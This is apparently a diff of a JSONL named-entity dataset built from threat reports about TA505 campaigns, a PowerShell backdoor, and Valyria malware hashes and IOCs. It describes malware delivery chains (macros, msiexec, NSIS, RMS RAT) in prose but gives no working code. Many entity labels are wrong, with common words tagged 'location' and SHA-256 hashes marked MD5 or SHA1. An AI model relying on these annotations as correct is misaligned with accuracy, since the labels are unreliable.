keys.","entities":[{"id":23345,"label":"location","start_offset":73,"end_offset":81},{"id":23346,"label":"identity","start_offset":82,"end_offset":85},{"id":23347,"label":"location","start_offset":107,"end_offset":112}],"relations":[],"Comments":[]} -{"id":7504,"text":"The third part contains the backdoor function.","entities":[],"relations":[],"Comments":[]} -{"id":7510,"text":"The backdoor first finds out the machine IP address by querying the internet service api[.]ipify[.]org, which returns the IP address of the currently infected machine.","entities":[],"relations":[],"Comments":[]} -{"id":7515,"text":"A simple RSA algorithm with very small keys encrypts the message seen above.","entities":[{"id":23365,"label":"identity","start_offset":9,"end_offset":12},{"id":23366,"label":"location","start_offset":33,"end_offset":38}],"relations":[],"Comments":[]} -{"id":7516,"text":"Let’s take the first character as an example.","entities":[],"relations":[],"Comments":[]} -{"id":7517,"text":"Character “{” = 0x7B =123.","entities":[],"relations":[],"Comments":[]} -{"id":7518,"text":"Variable ${prIVATE} = 959, 713 from section 1 of the PowerShell script has two values; the first number is the key and the second number is the modulus.","entities":[{"id":23368,"label":"location","start_offset":36,"end_offset":43},{"id":23370,"label":"attack-pattern","start_offset":53,"end_offset":63},{"id":23372,"label":"location","start_offset":115,"end_offset":118}],"relations":[],"Comments":[]} -{"id":7519,"text":"By computing (123 ^ 959) mod 713 = 340 we get the encrypted value of the first character (see number 340 in the figure below).","entities":[],"relations":[],"Comments":[]} -{"id":7521,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":7524,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} -{"id":7526,"text":"The message above can be decrypted to: {\"STATUS\": \"OK\", \"TOKEN\": \"d02153ffaf8137b1fa3bb852a27a12f8\"}","entities":[{"id":23390,"label":"location","start_offset":18,"end_offset":21},{"id":23391,"label":"MD5","start_offset":66,"end_offset":98}],"relations":[],"Comments":[]} -{"id":7529,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":7530,"text":"The XML message with the screenshot","entities":[],"relations":[],"Comments":[]} -{"id":7534,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":7536,"text":"For the PowerShell script, the first part contains a variable named dragon_middle, which is an array containing a few hundred URLs ending with connection.php that serve as proxies between victim and C&C.","entities":[{"id":23403,"label":"attack-pattern","start_offset":8,"end_offset":18},{"id":23406,"label":"location","start_offset":180,"end_offset":187},{"id":23407,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} -{"id":7537,"text":"If communication with C&C fails, and if the PowerShell script is run from a command line, a few error messages written in simplified Mandarin Chinese are displayed, with a curious phrase that translates to \"waiting for dragon\": 无法访问本地计算机寄存器 (Unable to access local computer register) 任务计划程序访问被拒绝 (Mission Scheduler access is denied) 无法连接到网址,请等待龙 (Cannot connect to URL, please wait for dragon) 无法连接到网址,请等待龙 (Cannot connect to website, please wait for dragon) These messages may not reveal anything about the real attackers as the malware writers sometimes like to embed false flags into their programs to confuse researchers.","entities":[{"id":23408,"label":"location","start_offset":33,"end_offset":36},{"id":23409,"label":"attack-pattern","start_offset":44,"end_offset":54},{"id":23411,"label":"location","start_offset":150,"end_offset":153},{"id":23412,"label":"location","start_offset":275,"end_offset":283},{"id":23413,"label":"location","start_offset":298,"end_offset":305},{"id":23414,"label":"location","start_offset":348,"end_offset":351},{"id":23415,"label":"location","start_offset":409,"end_offset":412},{"id":23416,"label":"location","start_offset":476,"end_offset":479},{"id":23417,"label":"location","start_offset":510,"end_offset":514}],"relations":[],"Comments":[]} -{"id":7539,"text":"Countermeasures and Trend Micro Solutions Users unfamiliar with the various kinds of social engineering techniques might find it difficult to distinguish a legitimate message from a malicious one – thus the need for education on identifying and mitigating phishing attacks – especially if it involves organizations in sensitive industries such as government and manufacturing.","entities":[{"id":23419,"label":"location","start_offset":16,"end_offset":19},{"id":23420,"label":"location","start_offset":26,"end_offset":31},{"id":23421,"label":"location","start_offset":192,"end_offset":195},{"id":23422,"label":"location","start_offset":241,"end_offset":244},{"id":23423,"label":"attack-pattern","start_offset":256,"end_offset":264},{"id":23424,"label":"location","start_offset":358,"end_offset":361}],"relations":[],"Comments":[]} -{"id":7545,"text":"Trend Micro™ Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. Trend Micro™ Deep Discovery™ Inspector and InterScan™ Web Security prevent malware from ever reaching end users.","entities":[{"id":23440,"label":"location","start_offset":6,"end_offset":11},{"id":23441,"label":"location","start_offset":19,"end_offset":27},{"id":23442,"label":"location","start_offset":48,"end_offset":53},{"id":23443,"label":"location","start_offset":98,"end_offset":108},{"id":23444,"label":"location","start_offset":112,"end_offset":116},{"id":23445,"label":"attack-pattern","start_offset":132,"end_offset":146},{"id":23446,"label":"location","start_offset":160,"end_offset":163},{"id":23448,"label":"location","start_offset":261,"end_offset":264},{"id":23450,"label":"location","start_offset":310,"end_offset":314}],"relations":[],"Comments":[]} -{"id":7548,"text":"It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. Indicators of Compromise (IOCs) Hashes detected as W2KM_VALYRIA.DOCT: 009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0 153117aa54492ca955b540ac0a8c21c1be98e9f7dd8636a36d73581ec1ddcf58 18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6 18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd 1ee9649a2f9b2c8e0df318519e2f8b4641fd790a118445d7a0c0b3c02b1ba942 2727bf97d7e2a5e7e5e41ccbfd7237c59023d70914834400da1d762d96424fde 2cea0b740f338c513a6390e7951ff3371f44c7c928abf14675b49358a03a5d13 3b1d8dcbc8072b1ec10f5300c3ea9bb20db71bd8fa443d97332790b74584a115 3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c 3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb 6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac 76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338 9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c 93745a6605a77f149471b41bd9027390c91373558f62058a7333eb72a26faf84 a70aca719b06fc8ef0cd0b0e010c7bc8dc6d632e4f2f874e4c0e553bd8db2df2 aa60c1fae6a0ef3b9863f710e46f0a7407cf0feffa240b9a4661a4e8884ac627 af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102 cee801b7a901eb69cd166325ed3770daffcd9edd8113a961a94c8b9ddf318c88 d07d4e71927cab4f251bcc216f560674c5fb783add9c9f956d3fc457153be025 dfbd67177af9d35188fc9ff9363c2b9017e9ccfe6719e3d641a56fb5dc0d47f7 eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894 fbbda9d8d9bcaaf9a7af84d08af3f5140f5f75778461e48253dc761cc9dc027c Hash detected as VBS_VALYRIA.DOCT: 0A9FC303CA03F4D9988A366CBBD96C24857E87374568EC5A4AAA4E55FE2C3C7E 0BC10D5396B3D8ECC54D806C59177B74E167D9F39D8F1B836806127AF36A7C4E 0BC10D5396B3D8ECC54D806C59177B74E167D9F39D8F1B836806127AF36A7C4E 25186621282D1E1BAD649B053BDB7B56E48B38189F80DB5A69B92301EF9ED613 25186621282D1E1BAD649B053BDB7B56E48B38189F80DB5A69B92301EF9ED613 3607432758176a2c41a1971b3c4d14a992a68b231851f8b81c6e816ea9ea29b2 59F9E0FAA73E93537AE4BD3A8695874BA25B66CEFA017537132914C770D0CF70 59F9E0FAA73E93537AE4BD3A8695874BA25B66CEFA017537132914C770D0CF70 59F9E0FAA73E93537AE4BD3A8695874BA25B66CEFA017537132914C770D0CF70 6228d79f56c574ceada16453404c54dd95641aa78d3faed6874daf485116793b 66af894eee6daae66bf0bcb87cb7abe2a0ebb6a59779f652db571e7ee298d751 92C7FEAD5EE0F0ECD35FE247DBE85648AADA4B96F1E960B527B4929E42D47B01 c006911be5480f09e0d8560c167561f68681607ca8f7e3c4f5d476dc6673594f F05C18C1D4428349137A9DF60CDEBE8A0F9E6DA47B359DC0616FF8D47E46704E Hash detected as TROJ_VALYRIA.PS: 0065d592d739ac1dd04d0335151c8855c7fafbf03e86134510ac2fc6766e8d60 0073ce0f4c82fc4d0470868e124aab9ad08852e1712564136186e5019fca0da0 02F58256FF52ED1CDB21064A28D6E5320005F02EF16E8B2FE851438BBC62A102 02F58256FF52ED1CDB21064A28D6E5320005F02EF16E8B2FE851438BBC62A102 04d61b1d2c3187280b3c4e93d064a051e9ee0f515f74c6c1c44ba577a7a1c804 04d61b1d2c3187280b3c4e93d064a051e9ee0f515f74c6c1c44ba577a7a1c804 0A9FC303CA03F4D9988A366CBBD96C24857E87374568EC5A4AAA4E55FE2C3C7E 0A9FC303CA03F4D9988A366CBBD96C24857E87374568EC5A4AAA4E55FE2C3C7E 4DD5C3CE5ED2145D5AFA8DD476A83DFC693E5FC7216C1EABB3FA0EB6B5F8590D 4DD5C3CE5ED2145D5AFA8DD476A83DFC693E5FC7216C1EABB3FA0EB6B5F8590D 55ae821cf112ff8d6185ce021f777f73d85150c62a835bb1c02fe9e7b3f863bf 61d846708f50024e1c65237eb7158beac9b9c5840853b03ef7c73fe5293a9a8d 624762a90b7272e247e5022576b7912d1aa0b32bc13aabc7ee47197e5b87a41b 6421C22D854C199B761436C87CAE1EAFFBA8783A3A40C00D4A0982D7C242EA79 92C7FEAD5EE0F0ECD35FE247DBE85648AADA4B96F1E960B527B4929E42D47B01 a53f832edc18de51e0ffaf67047072a6bbd5237defa74f5bf35dfc0df2aeca1b C1780F3AD76AF703CEDDD932B187CF919866A00BB3E2D6F0827B9DAE9D8875B6 C1780F3AD76AF703CEDDD932B187CF919866A00BB3E2D6F0827B9DAE9D8875B6 C9D782FFAA98791613FEF828E558B296932FA245192BD0EBA8F76536860DB84E C9D782FFAA98791613FEF828E558B296932FA245192BD0EBA8F76536860DB84E CCA8E84901C4184BE2849D29C39294FD4B6940F9A6668FDCFF9728CD319FFF96 CCA8E84901C4184BE2849D29C39294FD4B6940F9A6668FDCFF9728CD319FFF96 cca8e84901c4184be2849d29c39294fd4b6940f9a6668fdcff9728cd319fff96 e57dbce8130e281a73727122d33cbff170a54237cd0016d79b30ace18c94e7d4 Hash detected as JS_VALYRIA.DOCT: 070EBCAC92FB7619F957BF3F362099574158E5D2D0BC0CF9206A31BA55EDD48F Scriptlets and inf files related to applocker bypass: 2791fdc54ee037589f951c718935397e43d5f3d5f8e078e8b1e81165a3aebbaf 288afbe21d69e79a1cff44e2db7f491af10381bcc54436a8f900bcbd2a752a6f 5e173fbdcd672dade12a87eff0baf79ec4e80533e2b5f6cf1fac19ad847acba0 Tags Network | APT & Targeted Attacks | Research","entities":[{"id":23459,"label":"location","start_offset":17,"end_offset":25},{"id":23460,"label":"location","start_offset":57,"end_offset":64},{"id":23461,"label":"location","start_offset":65,"end_offset":68},{"id":23462,"label":"location","start_offset":83,"end_offset":86},{"id":23463,"label":"location","start_offset":101,"end_offset":104},{"id":23464,"label":"location","start_offset":133,"end_offset":136},{"id":23465,"label":"location","start_offset":137,"end_offset":142},{"id":23466,"label":"SHA2","start_offset":225,"end_offset":289},{"id":23467,"label":"SHA2","start_offset":290,"end_offset":354},{"id":23468,"label":"MD5","start_offset":355,"end_offset":419},{"id":23469,"label":"SHA1","start_offset":420,"end_offset":484},{"id":23470,"label":"MD5","start_offset":485,"end_offset":549},{"id":23471,"label":"SHA2","start_offset":550,"end_offset":614},{"id":23472,"label":"SHA2","start_offset":615,"end_offset":679},{"id":23473,"label":"SHA2","start_offset":680,"end_offset":744},{"id":23474,"label":"SHA1","start_offset":745,"end_offset":809},{"id":23475,"label":"MD5","start_offset":810,"end_offset":874},{"id":23476,"label":"SHA1","start_offset":875,"end_offset":939},{"id":23477,"label":"MD5","start_offset":940,"end_offset":1004},{"id":23478,"label":"SHA2","start_offset":1005,"end_offset":1069},{"id":23479,"label":"SHA2","start_offset":1070,"end_offset":1134},{"id":23480,"label":"SHA2","start_offset":1135,"end_offset":1199},{"id":23481,"label":"SHA1","start_offset":1200,"end_offset":1264},{"id":23482,"label":"SHA1","start_offset":1265,"end_offset":1329},{"id":23483,"label":"MD5","start_offset":1330,"end_offset":1394},{"id":23484,"label":"MD5","start_offset":1395,"end_offset":1459},{"id":23485,"label":"SHA2","start_offset":1460,"end_offset":1524},{"id":23486,"label":"SHA2","start_offset":1525,"end_offset":1589},{"id":23487,"label":"SHA2","start_offset":1590,"end_offset":1654},{"id":23488,"label":"SHA2","start_offset":1692,"end_offset":1756},{"id":23489,"label":"SHA2","start_offset":1757,"end_offset":1821},{"id":23490,"label":"SHA2","start_offset":1822,"end_offset":1886},{"id":23491,"label":"SHA2","start_offset":1887,"end_offset":1951},{"id":23492,"label":"SHA2","start_offset":1952,"end_offset":2016},{"id":23493,"label":"SHA2","start_offset":2017,"end_offset":2081},{"id":23494,"label":"SHA2","start_offset":2082,"end_offset":2146},{"id":23495,"label":"SHA2","start_offset":2147,"end_offset":2211},{"id":23496,"label":"SHA2","start_offset":2212,"end_offset":2276},{"id":23497,"label":"SHA2","start_offset":2277,"end_offset":2341},{"id":23498,"label":"SHA2","start_offset":2342,"end_offset":2406},{"id":23499,"label":"SHA2","start_offset":2407,"end_offset":2471},{"id":23500,"label":"SHA1","start_offset":2472,"end_offset":2536},{"id":23501,"label":"SHA2","start_offset":2537,"end_offset":2601},{"id":23502,"label":"MD5","start_offset":2638,"end_offset":2702},{"id":23503,"label":"SHA1","start_offset":2703,"end_offset":2767},{"id":23504,"label":"SHA2","start_offset":2768,"end_offset":2832},{"id":23505,"label":"SHA2","start_offset":2833,"end_offset":2897},{"id":23506,"label":"SHA2","start_offset":2898,"end_offset":2962},{"id":23507,"label":"SHA1","start_offset":2963,"end_offset":3027},{"id":23508,"label":"SHA2","start_offset":3028,"end_offset":3092},{"id":23509,"label":"SHA2","start_offset":3093,"end_offset":3157},{"id":23510,"label":"SHA2","start_offset":3158,"end_offset":3222},{"id":23511,"label":"SHA2","start_offset":3223,"end_offset":3287},{"id":23512,"label":"SHA2","start_offset":3288,"end_offset":3352},{"id":23513,"label":"MD5","start_offset":3353,"end_offset":3417},{"id":23514,"label":"SHA1","start_offset":3418,"end_offset":3482},{"id":23515,"label":"SHA2","start_offset":3483,"end_offset":3547},{"id":23516,"label":"SHA2","start_offset":3548,"end_offset":3612},{"id":23517,"label":"SHA2","start_offset":3613,"end_offset":3677},{"id":23518,"label":"SHA2","start_offset":3678,"end_offset":3742},{"id":23519,"label":"SHA2","start_offset":3743,"end_offset":3807},{"id":23520,"label":"SHA2","start_offset":3808,"end_offset":3872},{"id":23521,"label":"SHA2","start_offset":3873,"end_offset":3937},{"id":23522,"label":"SHA2","start_offset":3938,"end_offset":4002},{"id":23523,"label":"SHA2","start_offset":4003,"end_offset":4067},{"id":23524,"label":"SHA2","start_offset":4068,"end_offset":4132},{"id":23525,"label":"SHA2","start_offset":4133,"end_offset":4197},{"id":23526,"label":"SHA2","start_offset":4234,"end_offset":4298},{"id":23527,"label":"location","start_offset":4311,"end_offset":4314},{"id":23528,"label":"SHA2","start_offset":4355,"end_offset":4419},{"id":23529,"label":"MD5","start_offset":4420,"end_offset":4484},{"id":23530,"label":"SHA1","start_offset":4485,"end_offset":4549},{"id":23531,"label":"location","start_offset":4574,"end_offset":4577}],"relations":[],"Comments":[]} -{"id":7551,"text":"In the group's latest campaign, they started using HTML attachments to deliver malicious .XLS files that lead to downloader and backdoor FlawedAmmyy, mostly to target users in South Korea.","entities":[{"id":23538,"label":"location","start_offset":22,"end_offset":30},{"id":23539,"label":"location","start_offset":105,"end_offset":109},{"id":23540,"label":"location","start_offset":124,"end_offset":127},{"id":23541,"label":"tools","start_offset":137,"end_offset":148},{"id":23542,"label":"location","start_offset":160,"end_offset":166}],"relations":[],"Comments":[]} -{"id":7552,"text":" Figure 1. TA505’s latest infection chain","entities":[],"relations":[],"Comments":[]} -{"id":7554,"text":"We also touch on the latest TA505 developments, including an email stealer, their use of legitimate software and MSI Installer, and more.","entities":[{"id":23553,"label":"malware","start_offset":67,"end_offset":74},{"id":23554,"label":"location","start_offset":109,"end_offset":112},{"id":23556,"label":"location","start_offset":128,"end_offset":131}],"relations":[],"Comments":[]} -{"id":7556,"text":"As previously mentioned, TA505, first named by Proofpoint, is known for targeting financial enterprises.","entities":[],"relations":[],"Comments":[]} -{"id":7557,"text":"Since last December, TA505 has been very active and has been using legitimate or compromised RATs (remote access trojans) such as FlawedAmmyy, FlawedGrace, and Remote Manipulator System (RMS).","entities":[{"id":23565,"label":"location","start_offset":48,"end_offset":51},{"id":23566,"label":"location","start_offset":99,"end_offset":105},{"id":23567,"label":"tools","start_offset":130,"end_offset":141},{"id":23568,"label":"malware","start_offset":143,"end_offset":154},{"id":23569,"label":"location","start_offset":156,"end_offset":159},{"id":23570,"label":"location","start_offset":160,"end_offset":166},{"id":23571,"label":"malware","start_offset":187,"end_offset":190}],"relations":[],"Comments":[]} -{"id":7564,"text":" Figure 2. Korean language (left), simplified Chinese language (right) Microsoft Office instructions on how to enable macro Figure 3.","entities":[{"id":23602,"label":"tools","start_offset":81,"end_offset":87}],"relations":[],"Comments":[]} -{"id":7566,"text":"This said macro executes a command to download the first stage payload using msiexec.exe, a Microsoft Installer tool that can download and run a Windows Installer file.","entities":[{"id":23605,"label":"identity","start_offset":92,"end_offset":101},{"id":23606,"label":"location","start_offset":112,"end_offset":116},{"id":23607,"label":"location","start_offset":122,"end_offset":125},{"id":23608,"label":"location","start_offset":135,"end_offset":138}],"relations":[],"Comments":[]} -{"id":7567,"text":"The first stage payload is an MSI Installer that was created using an EXE to MSI converter.","entities":[],"relations":[],"Comments":[]} -{"id":7568,"text":" Figure 4. MSI Installer payload that used EXE to MSI converter","entities":[],"relations":[],"Comments":[]} -{"id":7569,"text":"The actual malicious payload is in the MSI Installer package.","entities":[],"relations":[],"Comments":[]} +{"id":11147,"text":"We terminated 4 YouTube channels as part of our actions against a coordinated influence operation.","entities":[],"relations":[],"Comments":[]} +{"id":8331,"text":"A new folder named \"Download\" is created adjacent to the main binary.","entities":[],"relations":[],"Comments":[]} +{"id":2803,"text":"On Friday May 12, 2017, Microsoft took the extraordinary step of releasing patches for out-of-support versions of Windows to help protect against these attacks.","entities":[{"id":48019,"label":"TIME","start_offset":10,"end_offset":22},{"id":48020,"label":"identity","start_offset":24,"end_offset":33},{"id":48021,"label":"SOFTWARE","start_offset":114,"end_offset":121}],"relations":[],"Comments":[]} {"id":7570,"text":"The payload can vary in each campaign, but it typically uses the FlawedAmmyy downloader, ServHelper, or RMS RAT launcher.","entities":[{"id":23611,"label":"location","start_offset":12,"end_offset":15},{"id":23612,"label":"location","start_offset":29,"end_offset":37},{"id":23613,"label":"malware","start_offset":65,"end_offset":76}],"relations":[],"Comments":[]} -{"id":7571,"text":"Payload as FlawedAmmyy downloader","entities":[{"id":23616,"label":"malware","start_offset":11,"end_offset":22}],"relations":[],"Comments":[]} -{"id":7572,"text":"The MSI Installer itself contains a FlawedAmmyy downloader, which is always signed.","entities":[{"id":23617,"label":"malware","start_offset":36,"end_offset":47}],"relations":[],"Comments":[]} -{"id":7573,"text":" Figure 5. FlawedAmmyy downloader Figure 6.","entities":[{"id":23619,"label":"malware","start_offset":11,"end_offset":22}],"relations":[],"Comments":[]} -{"id":7574,"text":"Digitally signed FlawedAmmyy downloader","entities":[{"id":23621,"label":"malware","start_offset":17,"end_offset":28}],"relations":[],"Comments":[]} -{"id":7576,"text":"It then runs the “net group \/domain” command and checks if “workgroup” is contained in the output result.","entities":[{"id":23624,"label":"malware","start_offset":18,"end_offset":21},{"id":23625,"label":"location","start_offset":45,"end_offset":48}],"relations":[],"Comments":[]} -{"id":7578,"text":"After performing the check, it downloads the RC4-encrypted FlawedAmmyy RAT, decrypts it, and executes it as the final payload.","entities":[{"id":23627,"label":"location","start_offset":21,"end_offset":26},{"id":23628,"label":"malware","start_offset":59,"end_offset":70},{"id":23629,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} -{"id":7579,"text":"We recently observed an instance where the FlawedAmmyy downloader was not digitally signed (FlawedAmmyy RAT payload is still signed, however).","entities":[{"id":23630,"label":"malware","start_offset":43,"end_offset":54}],"relations":[],"Comments":[]} -{"id":7581,"text":"If the MSI Installer package contains ServHelper as a payload, it will come with an NSIS (Nullsoft Scriptable Install System) installer.","entities":[{"id":23637,"label":"location","start_offset":66,"end_offset":70},{"id":23638,"label":"malware","start_offset":84,"end_offset":88}],"relations":[],"Comments":[]} -{"id":7582,"text":"Figure 7.","entities":[],"relations":[],"Comments":[]} -{"id":7583,"text":"NSIS Installer NSIS is a legitimate tool that manages the installation for Windows, but some hacking groups also abuse it.","entities":[{"id":23640,"label":"malware","start_offset":0,"end_offset":4},{"id":23641,"label":"malware","start_offset":15,"end_offset":19},{"id":23642,"label":"location","start_offset":36,"end_offset":40}],"relations":[],"Comments":[]} -{"id":7584,"text":"TA505, for instance, abuses NSIS to install ServHelper.","entities":[{"id":23644,"label":"malware","start_offset":28,"end_offset":32}],"relations":[],"Comments":[]} -{"id":7585,"text":"This NSIS installer has two files: (nsExec.dll and repotaj.dll) and [NSIS].nsi.","entities":[{"id":23646,"label":"malware","start_offset":5,"end_offset":9},{"id":23648,"label":"location","start_offset":47,"end_offset":50},{"id":23649,"label":"location","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} -{"id":7586,"text":"The latter is a configuration file that handles files to install.","entities":[],"relations":[],"Comments":[]} -{"id":7587,"text":"Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":7588,"text":"NSIS Installer sections","entities":[{"id":23651,"label":"malware","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} -{"id":7589,"text":"In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the “feast” parameter as its export function.","entities":[{"id":23652,"label":"location","start_offset":8,"end_offset":12},{"id":23653,"label":"malware","start_offset":36,"end_offset":46},{"id":23654,"label":"location","start_offset":48,"end_offset":52},{"id":23655,"label":"location","start_offset":76,"end_offset":79},{"id":23656,"label":"location","start_offset":122,"end_offset":128}],"relations":[],"Comments":[]} -{"id":7590,"text":"Once ServHelper is executed, it runs a PowerShell script to get information from the infected machine.","entities":[{"id":23658,"label":"attack-pattern","start_offset":39,"end_offset":49}],"relations":[],"Comments":[]} -{"id":7591,"text":"Payload as RMS RAT TA505 also uses RMS, a legitimate RAT, in their campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":7593,"text":"Figure 9.","entities":[],"relations":[],"Comments":[]} -{"id":7594,"text":"SFXRAR","entities":[],"relations":[],"Comments":[]} -{"id":7596,"text":"Three files extracted from SFXRAR Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":7597,"text":"Executed parameters As indicated in the parameter above, kernel.dll\/uninstall.exe is also SFXRAR, but password-protected.","entities":[],"relations":[],"Comments":[]} -{"id":7598,"text":"It will extract the following files (Figure 12) and execute exit.exe, where the said executable is also a launcher of i.cmd that registers winserv.exe (the actual RMS RAT) and executes it.","entities":[{"id":23672,"label":"location","start_offset":3,"end_offset":7},{"id":23674,"label":"location","start_offset":48,"end_offset":51},{"id":23675,"label":"malware","start_offset":163,"end_offset":166},{"id":23676,"label":"location","start_offset":172,"end_offset":175}],"relations":[],"Comments":[]} -{"id":7600,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":7601,"text":"Extracted files Figure 13.","entities":[],"relations":[],"Comments":[]} -{"id":7602,"text":"RMS RAT is added to the startup registry and executed Updates on TA505's tactics, techniques and procedures","entities":[{"id":23681,"label":"location","start_offset":24,"end_offset":31},{"id":23682,"label":"location","start_offset":41,"end_offset":44},{"id":23683,"label":"threat-actor","start_offset":65,"end_offset":70},{"id":23684,"label":"location","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} -{"id":7605,"text":"Using Amadey to distribute EmailStealer On April 24, we detected an attack that used Amadey as its first stage payload.","entities":[],"relations":[],"Comments":[]} -{"id":7612,"text":"Avoiding the use of msiexec.exe","entities":[],"relations":[],"Comments":[]} -{"id":7613,"text":"As previously mentioned, TA505 abuses msiexec.exe to install its first stage payload, but we recently observed the group just directly downloading the first stage payload binary and executing it.","entities":[{"id":23714,"label":"identity","start_offset":121,"end_offset":125},{"id":23715,"label":"location","start_offset":178,"end_offset":181}],"relations":[],"Comments":[]} -{"id":7614,"text":"Like the VBA macro code, the group just executes the downloaded file 234.exe by cmd.exe.","entities":[{"id":23716,"label":"identity","start_offset":35,"end_offset":39},{"id":23717,"label":"tools","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} -{"id":7617,"text":"However, as mentioned earlier, the group has also started to attach an HTML link in emails to trick users into opening the Excel file.","entities":[],"relations":[],"Comments":[]} -{"id":7618,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} -{"id":7619,"text":"Attached HTML","entities":[],"relations":[],"Comments":[]} -{"id":7624,"text":"Some recent cases we observed even had the Excel file directly attached to the emails.","entities":[],"relations":[],"Comments":[]} -{"id":7625,"text":"Figure 16.","entities":[],"relations":[],"Comments":[]} -{"id":7628,"text":"Thank you.)","entities":[],"relations":[],"Comments":[]} -{"id":7629,"text":"Suspicious activity involving TA505","entities":[{"id":23743,"label":"threat-actor","start_offset":30,"end_offset":35}],"relations":[],"Comments":[]} -{"id":7630,"text":"While analyzing TA505's activities, we encountered strange attacks that were very similar to TA505’s TTPs but with some differences.","entities":[{"id":23744,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":23745,"label":"threat-actor","start_offset":93,"end_offset":98}],"relations":[],"Comments":[]} -{"id":7632,"text":"But it also contains Kronos, a known banking trojan; and SmokeLoader, which is another payload downloader.","entities":[{"id":23751,"label":"malware","start_offset":21,"end_offset":27},{"id":23752,"label":"location","start_offset":53,"end_offset":56},{"id":23753,"label":"malware","start_offset":57,"end_offset":68}],"relations":[],"Comments":[]} -{"id":7636,"text":"The TA505 group usually attaches a malicious file without any compression.","entities":[],"relations":[],"Comments":[]} -{"id":7637,"text":"But this attack sent an email with a .rar or .zip attachment.","entities":[],"relations":[],"Comments":[]} -{"id":7641,"text":"Figure 17.","entities":[],"relations":[],"Comments":[]} -{"id":7643,"text":"For one thing, it has a different style of VBA macro.","entities":[],"relations":[],"Comments":[]} -{"id":7645,"text":" Figure 18. VBA macro with heavy obfuscation","entities":[],"relations":[],"Comments":[]} -{"id":7646,"text":"Another factor is its different codepage.","entities":[],"relations":[],"Comments":[]} -{"id":7647,"text":"Malicious Excel files that TA505 distributed had information harvesting capabilities.","entities":[],"relations":[],"Comments":[]} -{"id":7649,"text":"Lacking the use of fast flux infrastructure TA505 uses fast flux, a DNS technique used to mask botnets by quickly shifting among compromised hosts, which allows cybercriminals to delay or evade detection.","entities":[{"id":23793,"label":"threat-actor","start_offset":90,"end_offset":94}],"relations":[],"Comments":[]} -{"id":7653,"text":"Using Kronos and SmokeLoader (v2019) TA505 previously used Amadey to distribute the FlawedAmmyy downloader before, so the use of Kronos and SmokeLoader can’t be considered strong evidence of false attribution.","entities":[{"id":23802,"label":"location","start_offset":13,"end_offset":16},{"id":23803,"label":"malware","start_offset":17,"end_offset":28},{"id":23808,"label":"location","start_offset":136,"end_offset":139},{"id":23810,"label":"location","start_offset":172,"end_offset":178}],"relations":[],"Comments":[]} -{"id":7654,"text":"Using a different infrastructure to distribute spam","entities":[],"relations":[],"Comments":[]} -{"id":7655,"text":"The strongest evidence that this attack might not come from TA505 is that this attack operator used a different spam infrastructure.","entities":[],"relations":[],"Comments":[]} -{"id":7656,"text":"Our daily monitoring of TA505's activities show that the group sends spam from specific IPs; this suspicious attack used different sender IPs.","entities":[],"relations":[],"Comments":[]} -{"id":7657,"text":"We couldn’t find any of the IPs used in previous attacks.","entities":[],"relations":[],"Comments":[]} -{"id":7658,"text":"We can’t say for sure if this particular attack comes from TA505, another threat actor, an imitator, or perhaps just TA505 using another infrastructure.","entities":[{"id":23815,"label":"identity","start_offset":112,"end_offset":116}],"relations":[],"Comments":[]} -{"id":7659,"text":"This reiterates the tricky business of attribution in cybersecurity, which calls for careful inspection.","entities":[],"relations":[],"Comments":[]} -{"id":7660,"text":"While it's easy to attribute similar incidents to certain threat actors, groups, or even countries, attribution should ultimately be based on technically provable information.","entities":[],"relations":[],"Comments":[]} -{"id":7672,"text":"Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network.","entities":[{"id":23857,"label":"location","start_offset":55,"end_offset":60},{"id":23858,"label":"location","start_offset":105,"end_offset":115},{"id":23859,"label":"location","start_offset":119,"end_offset":123},{"id":23860,"label":"attack-pattern","start_offset":139,"end_offset":153},{"id":23861,"label":"location","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} -{"id":7678,"text":"Just like in previous operations, they continue to make small changes, such as targeting other countries, entities, or the combination of techniques used for deployment, for each campaign.","entities":[{"id":23878,"label":"identity","start_offset":0,"end_offset":4},{"id":23879,"label":"location","start_offset":56,"end_offset":61},{"id":23880,"label":"location","start_offset":179,"end_offset":187}],"relations":[],"Comments":[]} -{"id":7679,"text":"Despite the changes, TA505 continues to use either FlawedAmmyy RAT (remote access trojan) or ServHelper as payloads.","entities":[{"id":23882,"label":"malware","start_offset":51,"end_offset":62},{"id":23883,"label":"location","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} -{"id":7680,"text":"However, over the last nine campaigns since our June report, they also started using .ISO image attachments as the point of entry, as well as a .NET downloader, a new style for macro delivery, a newer version of ServHelper, and a .DLL variant of 